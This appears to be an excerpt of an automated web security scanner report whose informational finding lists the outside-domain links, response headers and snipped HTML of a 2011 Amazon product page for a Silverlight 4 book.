<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/WPF-4-Unleashed-Adam-Nathan/dp/0672331195/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_0672331195" ><img src="http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="WPF 4 Unleashed" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/180-9241494-4669614"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.374. http://www.amazon.com/gp/product/0981511821 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/0981511821

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/0981511821?ie=UTF8&tag=silverlightnet-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0981511821

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51PhrhFqJtL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51ZBCnP8+0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg
http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_AA300_.jpg
http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_SS75_.jpg
http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/videoreview._V192249916_.jpg
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AFEdr-Sxo7y5y0B1-NbJ9br2UtBr.rbuDsocsqHYlU1ZJb9k6HLPyN1x3cb79LnoUXN8SoGFXDmzZXvA6yC7GpYuRosM6NMN-8oMOwg9lRSEAvbeGurIVpReQxXZnNMzMwRV2w2v5UtQYPlvJNoIxYBPK1yaSMgL97IyYGWpBopF1Ns1hVXd3KLTZFZ8rQjuNPjY2OV2eBci..A0S-d5EUf2gff0MowIW2ELYva6fAw-3ZDaO56VKLEF7SZHhwPTVGrA.cD88b0CU2HBnM1LnbqW.MryryE0XWWDaYDVLhcclwkzKsAUR4RJbMzqYwFrRd4ozh0X4mvZc8b0.fr8BwaW-MUd16kRgcKyLdaEsqgB2u2Z2UM7q7O1GxoY3zPdY6DChj2lulKk.xoq9ofCB1BOUlQr1Xk9yC0KnSP6BLGcSwE.ud0Nt41pXmucgRVIl.ky-YE0-i.rsTbYBjIe8j.DFHQG1Xv5.g__&awt=1&s=
http://rd.a9.com/srv/redirect/?info=ALXqcbhG9vM2D6irv8fEI3E4QH.8ayUB8ApsoG0sd23l6DXxy-ifDDo0l5PIc44D.UxFWpVX5AZRSNlrTctAW60Epq1GTlhbmnHotp1ILB57vr0xkkBG.mQcT6LOsjYAs0PEcTW5IvLn4tQhcMcYcGFOOYJaLCPxAuqYGY2iLiFQsM5RHnkG4ujZiV82jIBV3AeXxy-VfF5gCTEBbQubdGSzd5mLi-g2p.NAEbPYcn57UCqU-TrjOVgUzbASuIBnZ7pFP91UnSwfjfzNcqYGlYQ7nH6391oX8yZvvbL5M.0124JtRit5zMjiAB7HizaJLMJ2d2qDQ3xfpXSDb6G9KYFUdPaeunIDoGj6P7.iMQHlxzOWvotzTg60iBJwp8fc0TfzkB5.7Vksu32NfDe9mS4DNPSru3svFlOp64WCy0uQES9kDeJGqjkjWHdb.B2EYhXS3vrrkpYZKMApCZFLdasZGO6o92TTrw__&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AMycm63-MSGQiOPE94MkUcF3QAaLOop-sKfbiC9iPa2K8gn3IvctrRSAPtnFD5zxMn5fe7C0gawQ3C7MRLZR.r9zXB018sw1Lz38IKagzezeY8UQ3g20caAtBKSvsps0W2RNWsL.RR6iSydbxqDdDRTqxObV4YhO8QboqbiEECUVgWwEVcITusEPQnqqXyezoCSs6bIbCehG8ywQ06eOH-nkdjZF9kEMD9rmfU74CzAVKEaSX.KXlTPSSc-nb6q19DGi0KGy3Cfb-N2OUfY1FrjkKlkk8KepVjRjNxNQqXxSfb2HfzekOgyVu-bPWAS0FUX2QL9C2wO7h7gaoxsQXxm2TaiC6iSfH4nTTFmrNcxGaZIsCl45wOXdDym5khFxEB5lpo0By5YviJcWgbYSQGhcXaPVZnwj2jF18wtu59z4d8GLB44syYXlzvtC7rMg6Jz0G2QuDPFIOmwWqHIZST8TflfUqUA32ZDa7FlW43QC&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:58:41 GMT
Server: Server
x-amz-id-1: 13V0KQF0V1XJ5NS5286W
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: krsQPAyRTkKaWtVO1Qq8wH+YtbzOxVZQzpCY0xxgZ6WKMTOXRr1WipNt2+G1JcsA
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=178-7471219-5935264; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=2Evohz0OYRkA4UAReSxzZkzhJrFwKqKdSd7mQSKB+dvsdVoN4otgoD65IPJJ+uoILxi/rSyRC1DgEMOOZ5uQuV3QmQYFmUQyfSFioPEETNO8j/iwgis+kVIg+Gv/tTr96omQ6aYNdp/vpHNTL1M8Ot3sPXscz/KFTzQVdEvduTuDIISDQCBX/LAZijQRhELhAbo5RaaGSvKO9qeB3jGsepQ5bgvXwk8d+iVJbduxMv+UNjlFcxYHFV592dnJV26i03JnKIK+XoAP/XIg97hF5HDurLwM8PM1mm3D6pbjJb55sYHFj6H7fqpOxjXNQGLWF0EBxIFH8GHEAlKl4E7wBSDb4Rdd17c3ElL/g2eae4nUe1LaV6SYTs/lHNxfe8cUzV/Y7vRrnD4bYr1wEhmmKXyMhBze6hC5vFxowFeGh02fjr60th3VNjYyePNZJrLP4KZYbpK1kPY=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:58:42 2011 GMT
Content-Length: 326858

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_AA300_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
s/0981511821/ref=dp_image_z_0?ie=UTF8&n=283155&s=books" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_AA300_.jpg" id="prodImage" width="300" height="300" border="0" alt="Silverlight 4 Jumpstart" onmouseover="" /></a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFEdr-Sxo7y5y0B1-NbJ9br2UtBr.rbuDsocsqHYlU1ZJb9k6HLPyN1x3cb79LnoUXN8SoGFXDmzZXvA6yC7GpYuRosM6NMN-8oMOwg9lRSEAvbeGurIVpReQxXZnNMzMwRV2w2v5UtQYPlvJNoIxYBPK1yaSMgL97IyYGWpBopF1Ns1hVXd3KLTZFZ8rQjuNPjY2OV2eBci..A0S-d5EUf2gff0MowIW2ELYva6fAw-3ZDaO56VKLEF7SZHhwPTVGrA.cD88b0CU2HBnM1LnbqW.MryryE0XWWDaYDVLhcclwkzKsAUR4RJbMzqYwFrRd4ozh0X4mvZc8b0.fr8BwaW-MUd16kRgcKyLdaEsqgB2u2Z2UM7q7O1GxoY3zPdY6DChj2lulKk.xoq9ofCB1BOUlQr1Xk9yC0KnSP6BLGcSwE.ud0Nt41pXmucgRVIl.ky-YE0-i.rsTbYBjIe8j.DFHQG1Xv5.g__&awt=1&s=" rel="nofollow">60+ <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFEdr-Sxo7y5y0B1-NbJ9br2UtBr.rbuDsocsqHYlU1ZJb9k6HLPyN1x3cb79LnoUXN8SoGFXDmzZXvA6yC7GpYuRosM6NMN-8oMOwg9lRSEAvbeGurIVpReQxXZnNMzMwRV2w2v5UtQYPlvJNoIxYBPK1yaSMgL97IyYGWpBopF1Ns1hVXd3KLTZFZ8rQjuNPjY2OV2eBci..A0S-d5EUf2gff0MowIW2ELYva6fAw-3ZDaO56VKLEF7SZHhwPTVGrA.cD88b0CU2HBnM1LnbqW.MryryE0XWWDaYDVLhcclwkzKsAUR4RJbMzqYwFrRd4ozh0X4mvZc8b0.fr8BwaW-MUd16kRgcKyLdaEsqgB2u2Z2UM7q7O1GxoY3zPdY6DChj2lulKk.xoq9ofCB1BOUlQr1Xk9yC0KnSP6BLGcSwE.ud0Nt41pXmucgRVIl.ky-YE0-i.rsTbYBjIe8j.DFHQG1Xv5.g__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFEdr-Sxo7y5y0B1-NbJ9br2UtBr.rbuDsocsqHYlU1ZJb9k6HLPyN1x3cb79LnoUXN8SoGFXDmzZXvA6yC7GpYuRosM6NMN-8oMOwg9lRSEAvbeGurIVpReQxXZnNMzMwRV2w2v5UtQYPlvJNoIxYBPK1yaSMgL97IyYGWpBopF1Ns1hVXd3KLTZFZ8rQjuNPjY2OV2eBci..A0S-d5EUf2gff0MowIW2ELYva6fAw-3ZDaO56VKLEF7SZHhwPTVGrA.cD88b0CU2HBnM1LnbqW.MryryE0XWWDaYDVLhcclwkzKsAUR4RJbMzqYwFrRd4ozh0X4mvZc8b0.fr8BwaW-MUd16kRgcKyLdaEsqgB2u2Z2UM7q7O1GxoY3zPdY6DChj2lulKk.xoq9ofCB1BOUlQr1Xk9yC0KnSP6BLGcSwE.ud0Nt41pXmucgRVIl.ky-YE0-i.rsTbYBjIe8j.DFHQG1Xv5.g__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.componentone.com/freetrial</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMycm63-MSGQiOPE94MkUcF3QAaLOop-sKfbiC9iPa2K8gn3IvctrRSAPtnFD5zxMn5fe7C0gawQ3C7MRLZR.r9zXB018sw1Lz38IKagzezeY8UQ3g20caAtBKSvsps0W2RNWsL.RR6iSydbxqDdDRTqxObV4YhO8QboqbiEECUVgWwEVcITusEPQnqqXyezoCSs6bIbCehG8ywQ06eOH-nkdjZF9kEMD9rmfU74CzAVKEaSX.KXlTPSSc-nb6q19DGi0KGy3Cfb-N2OUfY1FrjkKlkk8KepVjRjNxNQqXxSfb2HfzekOgyVu-bPWAS0FUX2QL9C2wO7h7gaoxsQXxm2TaiC6iSfH4nTTFmrNcxGaZIsCl45wOXdDym5khFxEB5lpo0By5YviJcWgbYSQGhcXaPVZnwj2jF18wtu59z4d8GLB44syYXlzvtC7rMg6Jz0G2QuDPFIOmwWqHIZST8TflfUqUA32ZDa7FlW43QC&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMycm63-MSGQiOPE94MkUcF3QAaLOop-sKfbiC9iPa2K8gn3IvctrRSAPtnFD5zxMn5fe7C0gawQ3C7MRLZR.r9zXB018sw1Lz38IKagzezeY8UQ3g20caAtBKSvsps0W2RNWsL.RR6iSydbxqDdDRTqxObV4YhO8QboqbiEECUVgWwEVcITusEPQnqqXyezoCSs6bIbCehG8ywQ06eOH-nkdjZF9kEMD9rmfU74CzAVKEaSX.KXlTPSSc-nb6q19DGi0KGy3Cfb-N2OUfY1FrjkKlkk8KepVjRjNxNQqXxSfb2HfzekOgyVu-bPWAS0FUX2QL9C2wO7h7gaoxsQXxm2TaiC6iSfH4nTTFmrNcxGaZIsCl45wOXdDym5khFxEB5lpo0By5YviJcWgbYSQGhcXaPVZnwj2jF18wtu59z4d8GLB44syYXlzvtC7rMg6Jz0G2QuDPFIOmwWqHIZST8TflfUqUA32ZDa7FlW43QC&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMycm63-MSGQiOPE94MkUcF3QAaLOop-sKfbiC9iPa2K8gn3IvctrRSAPtnFD5zxMn5fe7C0gawQ3C7MRLZR.r9zXB018sw1Lz38IKagzezeY8UQ3g20caAtBKSvsps0W2RNWsL.RR6iSydbxqDdDRTqxObV4YhO8QboqbiEECUVgWwEVcITusEPQnqqXyezoCSs6bIbCehG8ywQ06eOH-nkdjZF9kEMD9rmfU74CzAVKEaSX.KXlTPSSc-nb6q19DGi0KGy3Cfb-N2OUfY1FrjkKlkk8KepVjRjNxNQqXxSfb2HfzekOgyVu-bPWAS0FUX2QL9C2wO7h7gaoxsQXxm2TaiC6iSfH4nTTFmrNcxGaZIsCl45wOXdDym5khFxEB5lpo0By5YviJcWgbYSQGhcXaPVZnwj2jF18wtu59z4d8GLB44syYXlzvtC7rMg6Jz0G2QuDPFIOmwWqHIZST8TflfUqUA32ZDa7FlW43QC&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">microsoft.com/Web/WebMatrix</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALXqcbhG9vM2D6irv8fEI3E4QH.8ayUB8ApsoG0sd23l6DXxy-ifDDo0l5PIc44D.UxFWpVX5AZRSNlrTctAW60Epq1GTlhbmnHotp1ILB57vr0xkkBG.mQcT6LOsjYAs0PEcTW5IvLn4tQhcMcYcGFOOYJaLCPxAuqYGY2iLiFQsM5RHnkG4ujZiV82jIBV3AeXxy-VfF5gCTEBbQubdGSzd5mLi-g2p.NAEbPYcn57UCqU-TrjOVgUzbASuIBnZ7pFP91UnSwfjfzNcqYGlYQ7nH6391oX8yZvvbL5M.0124JtRit5zMjiAB7HizaJLMJ2d2qDQ3xfpXSDb6G9KYFUdPaeunIDoGj6P7.iMQHlxzOWvotzTg60iBJwp8fc0TfzkB5.7Vksu32NfDe9mS4DNPSru3svFlOp64WCy0uQES9kDeJGqjkjWHdb.B2EYhXS3vrrkpYZKMApCZFLdasZGO6o92TTrw__&awt=1&s=" rel="nofollow"><b>Jumpstart</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALXqcbhG9vM2D6irv8fEI3E4QH.8ayUB8ApsoG0sd23l6DXxy-ifDDo0l5PIc44D.UxFWpVX5AZRSNlrTctAW60Epq1GTlhbmnHotp1ILB57vr0xkkBG.mQcT6LOsjYAs0PEcTW5IvLn4tQhcMcYcGFOOYJaLCPxAuqYGY2iLiFQsM5RHnkG4ujZiV82jIBV3AeXxy-VfF5gCTEBbQubdGSzd5mLi-g2p.NAEbPYcn57UCqU-TrjOVgUzbASuIBnZ7pFP91UnSwfjfzNcqYGlYQ7nH6391oX8yZvvbL5M.0124JtRit5zMjiAB7HizaJLMJ2d2qDQ3xfpXSDb6G9KYFUdPaeunIDoGj6P7.iMQHlxzOWvotzTg60iBJwp8fc0TfzkB5.7Vksu32NfDe9mS4DNPSru3svFlOp64WCy0uQES9kDeJGqjkjWHdb.B2EYhXS3vrrkpYZKMApCZFLdasZGO6o92TTrw__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALXqcbhG9vM2D6irv8fEI3E4QH.8ayUB8ApsoG0sd23l6DXxy-ifDDo0l5PIc44D.UxFWpVX5AZRSNlrTctAW60Epq1GTlhbmnHotp1ILB57vr0xkkBG.mQcT6LOsjYAs0PEcTW5IvLn4tQhcMcYcGFOOYJaLCPxAuqYGY2iLiFQsM5RHnkG4ujZiV82jIBV3AeXxy-VfF5gCTEBbQubdGSzd5mLi-g2p.NAEbPYcn57UCqU-TrjOVgUzbASuIBnZ7pFP91UnSwfjfzNcqYGlYQ7nH6391oX8yZvvbL5M.0124JtRit5zMjiAB7HizaJLMJ2d2qDQ3xfpXSDb6G9KYFUdPaeunIDoGj6P7.iMQHlxzOWvotzTg60iBJwp8fc0TfzkB5.7Vksu32NfDe9mS4DNPSru3svFlOp64WCy0uQES9kDeJGqjkjWHdb.B2EYhXS3vrrkpYZKMApCZFLdasZGO6o92TTrw__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.towingpros.net/Emergency</a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Jumpstart-David-Yack/dp/0981511821/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_SS75_.jpg" width="75" alt="Silverlight 4 Jumpstart" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Data and Services Cookbook" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Silverlight 4 in Action" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51PhrhFqJtL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/videoreview._V192249916_.jpg" width="109" alt="Video reviews" height="94" border="0" />
</td>
...[SNIP]...
</div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<script type="text/javascript">
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/51tfCjbRXJL._SL500_SS75_.jpg" width="50" alt="Silverlight 4 Jumpstart" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
